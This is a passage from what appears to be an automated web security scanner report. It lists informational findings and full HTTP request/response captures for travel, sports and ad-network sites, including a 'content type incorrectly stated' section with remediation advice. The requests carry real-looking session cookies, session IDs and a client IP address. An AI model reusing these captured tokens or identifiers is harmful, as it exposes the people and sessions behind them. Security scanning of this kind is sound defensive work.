Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; adRotator=true; JSESSIONID=DFE4F06BE571072B; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|egapp2189p.prod.orbitz.net; curr=USD; myTests=UBP323_SinglePage%3A%7C%3A%7CMERCH500_LeadPriceHiding%3A%7CHOTEL200_SR_Navigation%3A%7C%3A%7CHotelRecommendationAlgorithm%3A%7CUBP_Telesales_Optimization%3A%7C%3A%7C%3A%7CHOTEL210_Dateless_Recommendations%3A%7Cv1; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDA1NTEzNDh8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOTowOToxMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b25545525d5f4f58455e445a4a4217b9; mbox=session#1317600406536-142286#1317602423|check#true#1317600623

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:38 GMT
ETag: "2e-4adda022fb780"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:45:34 GMT
Content-Type: text/html
ntCoent-Length: 46
Server: Apache
Date: Mon, 03 Oct 2011 00:09:26 GMT
Age: 1432
Connection: keep-alive
Content-Length: 46

<html><head></head><body>&nbsp;</body></html>
27.78. http://www.orbitz.com/cacheable/cedexis/radar.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /cacheable/cedexis/radar.html

Request

GET /cacheable/cedexis/radar.html HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; JSESSIONID=DFE4F06BE571072B; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|egapp2189p.prod.orbitz.net; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDA1NTEzNDh8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOTowOToxMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b25545525d5f4f58455e445a4a4217b9; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; mbox=session#1317600406536-142286#1317602423|check#true#1317600623|PC#1317600406536-142286.19#1320192592; curr=USD; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317597038767:ss=1317596806325; _br_uid_1=uid%3D999836241826%3A; _br_uid_2=uid%3D999836241826%3A%3A

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:38 GMT
ETag: "292-4adda022fb780"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:46:16 GMT
Content-Type: text/html
Cteonnt-Length: 658
Server: Apache
Date: Mon, 03 Oct 2011 00:11:48 GMT
Age: 1533
Connection: keep-alive
Content-Length: 658

<html>
   <head>
       <script type="text/javascript">
           var radarSettings = {
               zoneId: '1',
               customerId: '10325'
           };
           (function(d, w) {
               var onWindowLoaded = function() {
                   var a = docum
...[SNIP]...
27.79. http://www.orbitz.com/cacheable/empty.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /cacheable/empty.html

Request

GET /cacheable/empty.html HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; adRotator=true; JSESSIONID=DFE4F06BE571072B; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|egapp2189p.prod.orbitz.net; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDA1NTEzNDh8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOTowOToxMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b25545525d5f4f58455e445a4a4217b9; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; mbox=session#1317600406536-142286#1317602423|check#true#1317600623|PC#1317600406536-142286.19#1320192592

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:38 GMT
ETag: "8-4adda022fb780"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:46:12 GMT
Content-Type: text/html
Cteonnt-Length: 8
Server: Apache
Date: Mon, 03 Oct 2011 00:10:13 GMT
Age: 1441
Connection: keep-alive
Content-Length: 8

<!-- -->
27.80. http://www.orbitz.com/shared/adserverProxy.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Request

GET /shared/adserverProxy.jsp?tab=1 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 909
Date: Mon, 03 Oct 2011 00:07:23 GMT
Cache-Control: private
Content-Length: 909

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=84082&AdID=273149&TargetID=37186&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14861,22067,24028,273
...[SNIP]...
27.81. http://www.trip.com/box_ad_refresh.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trip.com
Path:   /box_ad_refresh.html

Request

GET /box_ad_refresh.html?type= HTTP/1.1
Host: www.trip.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e3442f45525d5f4f58455e445a4a423660; NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3882b45525d5f4f58455e445a4a423660; __utma=245868737.2049523975.1317602099.1317602099.1317602099.1; __utmb=245868737.2.10.1317602099; __utmc=245868737; __utmz=245868737.1317602099.1.1.utmcsr=orbitz|utmccn=triplooking|utmcmd=crpopunder|utmcct=air; mbox=check#true#1317602160|session#1317602099178-690078#1317603960|PC#1317602099178-690078.19#1318811702; __qca=P0-1307346892-1317602104437; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D1%3B%20s_sq%3Dobtzawytrip.comprod%253D%252526pid%25253DFlights%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bjavascript%2525253AshowRndTripProviders%25252528%25252527flights%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DRADIO%3B

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:35:10 GMT
Server: Apache/2.2.18 (Unix) DAV/2 mod_jk/1.2.23
Last-Modified: Fri, 23 Sep 2011 00:04:36 GMT
ETag: "c42-4ad908dfe6d00"
Accept-Ranges: bytes
Cteonnt-Length: 3138
Content-Type: text/html
Cache-Control: private
Content-Length: 3138

<HTML>
<HEAD>
<script language="JavaScript" src="http://media.away.com/trip/tripjs/dcl/comparerates-min.js" type="text/javascript"></script>
<style>
h6.adlabel {text-align:center;color:#7E7E7E;fon
...[SNIP]...
27.82. http://www9.effectivemeasure.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www9.effectivemeasure.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hl=1; vt=6c50a866261632f39839b9e202024e62e18088e413-981323754e88f9bc

Response

HTTP/1.1 404 Not Found
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 345
Date: Mon, 03 Oct 2011 00:53:52 GMT
Server: C15

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
27.83. http://xml.premierleague.com/crossDomain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xml.premierleague.com
Path:   /crossDomain.html

Request

GET /crossDomain.html HTTP/1.1
Host: xml.premierleague.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=233090271.104762655.1317599330.1317599330.1317599330.1; __utmb=233090271.1.10.1317599330; __utmc=233090271; __utmz=233090271.1317599330.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Tue, 28 Sep 2010 08:48:57 GMT
Content-Type: text/html
Expires: Sun, 02 Oct 2011 23:49:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:49:08 GMT
Content-Length: 3198
Connection: close
Vary: Accept-Encoding

<head>
<script type="text/javascript" src="/js/jquery.js"></script>
<script type="text/javascript">
function getContentCallback(ajxUrl, ajxType, ajxCache, ajxDataType, callBackSuccess,
...[SNIP]...
28. Content type incorrectly stated  previous  next
There are 119 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

28.1. http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/1310831078  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.monetate.net
Path:   /trk/3/s/a-06b34e08/p/travelocity.com/1310831078

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-06b34e08/p/travelocity.com/1310831078?mr='13357'&mi='1.249362358.1317600494998'&mt=!n&cs=!t&e=!(viewPage,gr)&pt=hoteloptions&pc=!(HOTEL_flow)&cv=(cbHistoryPerm:t)&r='http://travel.travelocity.com/hotel/HotelAvailability.do%3Bjsessionid%3D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%3FService%3DTRAVELOCITY%26SEQ%3D1317600526540922011%26pathIndicator%3DHOTEL_FRONTDOOR%26leavingDate%3Dmm/dd/yyyy%26returningDate%3Dmm/dd/yyyy%26city%3Dbos%26cityCountryCode%3DUS%26dateFormat%3Dmm/dd/yyyy%26searchMode%3Dcity%26'&sw=1920&sh=1200&sc=16&j=!t&u='http://travel.travelocity.com/hotel/HotelDetail.do%3Bjsessionid%3D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%3Ftab%3Dguide%26tripType%3Dhotel%26propertyId%3D4810%26airport%3DBOS%26resetReview%3Dtrue%26hotelQKey%3D-2237575859332798600%26tsHotelQKey%3D-2237575859332798600%26reviewPage%3DreviewStart%26locLink%3DHOTEL.HOTELAVAILABILITYLISTLITE1%7CNAT1%26dr%3D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149'&ce=(PrfFlightSrch:t)&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 66
Expires: Mon, 26 Sep 2011 00:13:18 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 03 Oct 2011 00:13:18 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["modFlexTab", "Cheapest Dates"], ["c", 1310831078]]);
28.2. http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/1982940443  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.monetate.net
Path:   /trk/3/s/a-06b34e08/p/travelocity.com/1982940443

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-06b34e08/p/travelocity.com/1982940443?mr='13357'&mi='1.249362358.1317600494998'&mt=!n&cs=!t&e=!(viewPage,gr)&pt=unknown&r='http://www.travelocity.com/'&sw=1920&sh=1200&sc=16&j=!t&u='http://www.travelocity.com/472a'&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 26 Sep 2011 00:08:18 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 03 Oct 2011 00:08:18 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 1982940443]]);
28.3. http://a1.interclick.com/getInPageJS.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.interclick.com
Path:   /getInPageJS.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJS.aspx?a=54&b=50793&cid=634044326623672665 HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Opt=out; T=1

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Mon, 03 Oct 2011 05:59:49 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sun, 02 Oct 2011 23:59:49 GMT
Content-Length: 6352

function isSilverlightVersionInstalled(version)
{
if (version == undefined)
version = null;

var isVersionSupported = false;
var container = null;

try
{

...[SNIP]...
28.4. http://a1.interclick.com/getInPageJSProcess.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.interclick.com
Path:   /getInPageJSProcess.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJSProcess.aspx?a=54&b=50793&cid=634044326623672665&isif=f&rurld=www.premierleague.com&sl=true&dvp=http%3A//www.premierleague.com/page/Home&rurl=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHeadlines%2F0%2C%2C12306~2466648%2C00.html HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Opt=out; T=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 03 Oct 2011 00:00:01 GMT
Content-Length: 636

document.write(unescape("%3CSCRIPT%20language%3D%27JavaScript1.1%27%20SRC%3D%22http%3A//ad.doubleclick.net/adj/N4610.153021.INTERCLICKNETWORK/B5581164.6%3Bsz%3D160x600%3Bclick%3Dhttp%3A//a1.interclick
...[SNIP]...
28.5. http://a2.twimg.com/profile_images/1470671793/ProfilePhoto_normal.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a2.twimg.com
Path:   /profile_images/1470671793/ProfilePhoto_normal.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /profile_images/1470671793/ProfilePhoto_normal.png HTTP/1.1
Host: a2.twimg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://hublotnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: gIeo4kgEP+1D9vqcLTjQgovHZJerwRXBngjHaKS2Aevpcdg7FcxsH3i1uSvVfIfq
x-amz-request-id: CB4FBC38941AF74A
Last-Modified: Sun, 31 Jul 2011 11:06:27 GMT
ETag: "e9c31ecfe665754654c7a297073b9bab"
Accept-Ranges: bytes
Content-Length: 1883
Server: AmazonS3
Cache-Control: max-age=31435387
Expires: Sun, 30 Sep 2012 20:04:17 GMT
Date: Mon, 03 Oct 2011 00:01:10 GMT
Connection: close
Content-Type: image/png
X-CDN: AKAM

......JFIF.....H.H.....XExif..MM.*...................i.........&.............................@...................C.....................................    ...    ......    


.....
.    


...C...........
...


...[SNIP]...
28.6. http://ad.reklamport.com/rpgetad.ashx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.reklamport.com
Path:   /rpgetad.ashx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /rpgetad.ashx?tt=t_reklamporttakip_THY_LP&ciid=483764&rnd=0.5661881791893393 HTTP/1.1
Host: ad.reklamport.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 177
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: policyref="http://ad.reklamport.com/w3c/p3p.xml", CP="NON DSP COR CURa TIA"
mc: 155
Date: Sun, 02 Oct 2011 23:58:47 GMT
Connection: close

document.write("<script language='JavaScript' type='text/javascript'>"+"rp_html(483764,411702,..<script> </scr..+..ipt>..);".replace(new RegExp('..','gm'), '"')+"</sc"+"ript>");
28.7. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /PortalServe/?pid=1399334Q81720110831160016&flash=10&time=0|18:49|-5&redir=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~538936~3448~59764~134043~106934~3~345~25~premierleague.com~2~8~1~0~2~1~-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^~19~2~5ZvoQhA3FQCr~PpAVCxNh2PJr~1~1~1~~http%3A%2F%2Fbh.contextweb.com%2Fbh%2Fset.aspx%3Faction%3Dadd%26advid%3D3448%26token%3DTTCL1%26rurl%3D$CTURL$&data=345&r=0.26698742574080825 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
